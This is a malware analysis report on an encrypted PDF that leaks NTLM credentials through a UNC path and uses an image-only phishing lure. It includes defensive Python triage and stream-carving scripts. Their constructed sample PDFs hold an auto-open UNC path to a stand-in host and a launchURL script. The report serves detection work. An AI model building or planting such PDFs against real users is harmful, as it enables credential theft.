Malicious PDF — malware analysis report

Static analysis result for SHA-256 7ab5e1fa4371d3e4…

Verdict: MALICIOUS
File type: PDF

Size: 172.2 KB
Created: not readable (the /CreationDate string object is encrypted; see PDF_ENCRYPTED below)
Authoring application: not readable (the /Producer and /Creator string objects are encrypted; see PDF_ENCRYPTED below)
First seen: 2022-06-25
MD5: 56a764334f963809b06d5d619715d386
SHA-1: 1c4edbd4d3347a645fb94f06642d82c0a7c40df7
SHA-256: 7ab5e1fa4371d3e45961f396dc27f047c32e5b45bc597898604c1ff67a6b4ef6
Risk score: 64

Malware Insights

MITRE ATT&CK
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay
  • T1078.001 Valid Accounts: Default Accounts
  • T1078.002 Valid Accounts: Domain Accounts
  • T1078.003 Valid Accounts: Local Accounts
  • T1078.004 Valid Accounts: Cloud Accounts

The PDF is encrypted and contains a UNC path alongside an action trigger, the pattern behind NTLM credential leakage from Adobe Acrobat/Reader (CVE-2018-4993): when the viewer follows the path, the Windows SMB client authenticates to the attacker's host automatically and exposes the user's NTLM challenge-response (Net-NTLMv2), which can be cracked offline or relayed to another service. The document is also flagged as an image-only lure with a click-outward action, the usual shape of a phishing or social-engineering pretext. The two embedded URLs are likely part of the lure or of the command-and-control infrastructure, but they are not detections on their own.

Machine Learning

  • Nyx PDF Classifier clean score 0.1557

Heuristics (4)

  • UNC path in PDF: possible NTLM credential theft (CVE-2018-4993 / CVE-2019-7089) [high] CVE likely: CVE-2018-4993
    PDF contains a UNC path (\\server\share) alongside action triggers. When a vulnerable viewer resolves the path as the matching action is processed, the Windows SMB client authenticates to the remote host without prompting and leaks the user's NTLM challenge-response (Net-NTLMv2), which the attacker can crack offline or relay. CVE-2019-7089 is the later bypass of the CVE-2018-4993 fix; the same heuristic covers both.
  • Image-only document with action trigger (screenshot lure) [medium] PDF_IMAGE_LURE
    PDF has 2 image(s) and 0 text block(s), carries a click-outward action, and is only 172 KB: the typical shape of a phishing lure in which a full-page screenshot hides a clickable button that launches or submits to an attacker URL.
  • Encrypted PDF (string and stream contents are opaque to static scan) [info] PDF_ENCRYPTED
    PDF declares /Encrypt: string objects and stream contents are encrypted with the standard security handler (RC4 or AES). On its own this is informational; legitimate encrypted documents include signed contracts, billing statements, and rights-managed material. Static heuristics cannot inspect encrypted payload bytes, which is also why the Created and Authoring application fields above are unreadable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
      • http://www.pdf-conversa.com
      • http://www.ascomp-software.de/forum/
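As an added illustration of how the four heuristics above can be checked statically (example code written for this page, not the analyser's own rule engine), the script below scans raw PDF bytes for /Encrypt, action and trigger keys, UNC paths in string objects, URLs, image XObjects and text blocks, and maps the findings onto the same severities. The sample PDF, the 10.0.0.5 host and the example.invalid URL are constructed for the demo and are not taken from the analysed file.

```python
"""Static PDF triage reproducing the heuristics above (added example).

Pure regex over the raw bytes; nothing is decrypted, which is the same blind
spot PDF_ENCRYPTED describes, and compressed content streams must be inflated
first for the BT text count to mean anything. SAMPLE_PDF is constructed here.
"""
import re
from dataclasses import dataclass, field

# Action types that make a viewer open a path or URL when triggered ...
ACTION_KEYS = (b"/GoToR", b"/GoToE", b"/Launch", b"/URI", b"/SubmitForm")
# ... and the places an action can be wired to: document open, page/field
# events, link annotations.
TRIGGER_KEYS = (b"/OpenAction", b"/AA", b"/Annots")

LITERAL_RE = re.compile(rb"\(((?:\\.|[^\\()])*)\)", re.S)  # (...) strings, no nesting
HEX_RE = re.compile(rb"(?<!<)<([0-9A-Fa-f\s]*)>")          # <...> strings, not << dicts
URL_RE = re.compile(rb"https?://[^\s()<>\"']+")
IMAGE_RE = re.compile(rb"/Subtype\s*/Image\b")
TEXT_RE = re.compile(rb"(?<![A-Za-z])BT(?![A-Za-z])")       # begin-text operator
_ESC = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f"}


def unescape(s: bytes) -> bytes:
    r"""Decode PDF literal-string escapes (\ddd octal is simplified away)."""
    return re.sub(rb"\\(.)", lambda m: _ESC.get(m.group(1), m.group(1)), s, flags=re.S)


def pdf_strings(data: bytes):
    """Yield the decoded bytes of every literal and hex string object."""
    for m in LITERAL_RE.finditer(data):
        yield unescape(m.group(1))
    for m in HEX_RE.finditer(data):
        h = re.sub(rb"\s", b"", m.group(1))
        if len(h) % 2:
            h += b"0"                       # an odd final digit is padded with 0
        yield bytes.fromhex(h.decode("ascii"))


@dataclass
class Findings:
    size: int = 0
    encrypted: bool = False
    actions: list = field(default_factory=list)
    triggers: list = field(default_factory=list)
    unc_paths: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    images: int = 0
    text_blocks: int = 0


def scan(data: bytes) -> Findings:
    f = Findings(size=len(data))
    f.encrypted = re.search(rb"/Encrypt\b", data) is not None
    f.actions = [k.decode() for k in ACTION_KEYS if re.search(re.escape(k) + rb"\b", data)]
    f.triggers = [k.decode() for k in TRIGGER_KEYS if re.search(re.escape(k) + rb"\b", data)]
    f.images = len(IMAGE_RE.findall(data))
    f.text_blocks = len(TEXT_RE.findall(data))
    for s in pdf_strings(data):
        # A viewer hands both \\host\share and //host/share to the SMB client.
        if s.startswith(b"\\\\") or s.startswith(b"//"):
            f.unc_paths.append(s.decode("latin-1"))
        f.urls.extend(u.decode("latin-1") for u in URL_RE.findall(s))
    f.urls = sorted(set(f.urls))
    return f


def triage(f: Findings) -> list:
    """Map findings to (severity, rule) pairs like the ones in the report."""
    hits = []
    if f.unc_paths and f.actions and f.triggers:
        hits.append(("high", "UNC path reachable from a PDF action: possible NTLM credential leak"))
    if f.images and f.text_blocks == 0 and ({"/URI", "/GoToR", "/Launch"} & set(f.actions)):
        hits.append(("medium", "image-only document with click-outward action (screenshot lure)"))
    if f.encrypted:
        hits.append(("info", "/Encrypt present: strings and streams are opaque to this scan"))
    if f.urls:
        hits.append(("info", "%d embedded URL(s): %s" % (len(f.urls), ", ".join(f.urls))))
    return hits


# Constructed sample: one page whose open action points at a UNC path and whose
# only content is a full-page image covered by a link annotation (no text).
SAMPLE_PDF = rb"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction << /S /GoToR /F (\\\\10.0.0.5\\share\\doc.pdf) /D [0 /Fit] >> >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Resources << /XObject << /Im1 4 0 R >> >> /Contents 5 0 R /Annots [6 0 R] >> endobj
4 0 obj << /Type /XObject /Subtype /Image /Width 1 /Height 1 /ColorSpace /DeviceGray /BitsPerComponent 8 /Length 1 >> stream
A
endstream endobj
5 0 obj << /Length 30 >> stream
q 612 0 0 792 0 0 cm /Im1 Do Q
endstream endobj
6 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 612 792] /A << /S /URI /URI (http://example.invalid/login) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    findings = scan(SAMPLE_PDF)
    print(findings)
    for severity, rule in triage(findings):
        print("[%s] %s" % (severity, rule))
```

On the constructed sample the scan reports the UNC path, the /GoToR and /URI actions, the /OpenAction and /Annots triggers, one image and no text, and triage returns the same high/medium/info ladder the report shows. Appending an /Encrypt entry to the trailer flips the informational rule on without changing the rest, which is the point: encryption is context, not a verdict.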

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: stream_035_off00007fa8.bin
SHA-256: 0c488f01075ad950b0e0c5ba43453b0b04db70c0b0f940548d4bdb4806084e66
Kind: decompressed-pdf-stream
Source: PDF FlateDecoded stream at offset 0x7FA8
Size: 624780 bytes
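The artifact above is a FlateDecode stream the analyser inflated and hashed. The script below, an added example rather than the analyser's own carving code, does the same for every FlateDecode stream in a PDF: it records the body offset in a stream_<n>_off<offset>.bin name, hashes the inflated bytes, and reports an inflation failure instead of dropping the stream, which is exactly what an encrypted stream looks like to a tool that has no key. The sample PDF, its JavaScript string and the example.invalid URL are constructed for the demo; PNG predictors (/DecodeParms) are not undone.

```python
"""Carve FlateDecode streams out of a PDF (added example, not the analyser's code).

Each carved stream gets the stream_<n>_off<offset>.bin name, its SHA-256 and
its decompressed size, as in the artifacts table. Inflation is attempted on
the raw bytes, so a stream that is really encrypted fails to inflate and is
reported that way rather than silently skipped.
"""
import hashlib
import re
import zlib

# "N G obj << dict >> stream\n<body>\nendstream": the dict may hold nested
# << >> but never crosses an endobj; the body runs to the first endstream.
STREAM_RE = re.compile(
    rb"(\d+)\s+(\d+)\s+obj\s*<<((?:(?!endobj).)*?)>>\s*stream\r?\n(.*?)\r?\nendstream",
    re.S,
)


def carve_streams(data: bytes) -> list:
    """Return one record per FlateDecode stream found in data."""
    artifacts = []
    for idx, m in enumerate(STREAM_RE.finditer(data)):
        dict_bytes, body = m.group(3), m.group(4)
        if b"/FlateDecode" not in dict_bytes:
            continue                       # raw, DCT, etc. are out of scope here
        offset = m.start(4)                # file offset of the compressed body
        try:
            d = zlib.decompressobj()       # tolerates trailing bytes after the zlib end
            plain = d.decompress(body) + d.flush()
            status = "ok"
        except zlib.error as e:
            plain, status = b"", "inflate failed: %s" % e   # encrypted or corrupt
        artifacts.append({
            "name": "stream_%03d_off%08x.bin" % (idx, offset),
            "object": "%s %s R" % (m.group(1).decode(), m.group(2).decode()),
            "offset": offset,
            "kind": "decompressed-pdf-stream",
            "sha256": hashlib.sha256(plain).hexdigest(),
            "size": len(plain),
            "status": status,
            "data": plain,
        })
    return artifacts


def _stream_obj(num: int, dict_bytes: bytes, body: bytes) -> bytes:
    return b"%d 0 obj\n<< %s /Length %d >>\nstream\n%s\nendstream\nendobj\n" % (
        num, dict_bytes, len(body), body)


def build_sample_pdf() -> bytes:
    """Constructed PDF: a compressed content stream, a compressed JavaScript
    stream, and a stream of opaque bytes standing in for an encrypted one."""
    content = b"BT /F1 12 Tf 72 720 Td (Open the attachment) Tj ET"
    js = b"app.launchURL('http://example.invalid/', true);"   # example.invalid is a placeholder
    opaque = bytes(range(0x80, 0xA8))      # not valid zlib data: inflate must fail
    return (b"%PDF-1.4\n"
            b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction << /S /JavaScript /JS 5 0 R >> >>\nendobj\n"
            + _stream_obj(4, b"/Filter /FlateDecode", zlib.compress(content))
            + _stream_obj(5, b"/Filter /FlateDecode", zlib.compress(js))
            + _stream_obj(6, b"/Filter /FlateDecode", opaque)
            + b"trailer\n<< /Root 1 0 R /Encrypt 7 0 R >>\n%%EOF\n")


if __name__ == "__main__":
    for a in carve_streams(build_sample_pdf()):
        print("%(name)s  %(object)s  %(size)7d bytes  %(sha256)s  %(status)s" % a)
```

Run against the constructed file this yields two inflated streams with their hashes and one "inflate failed" record; on a real encrypted sample every stream outside the /Identity crypt filter will land in that last bucket, so a single successfully inflated stream (like the one in the table above) is itself worth noting.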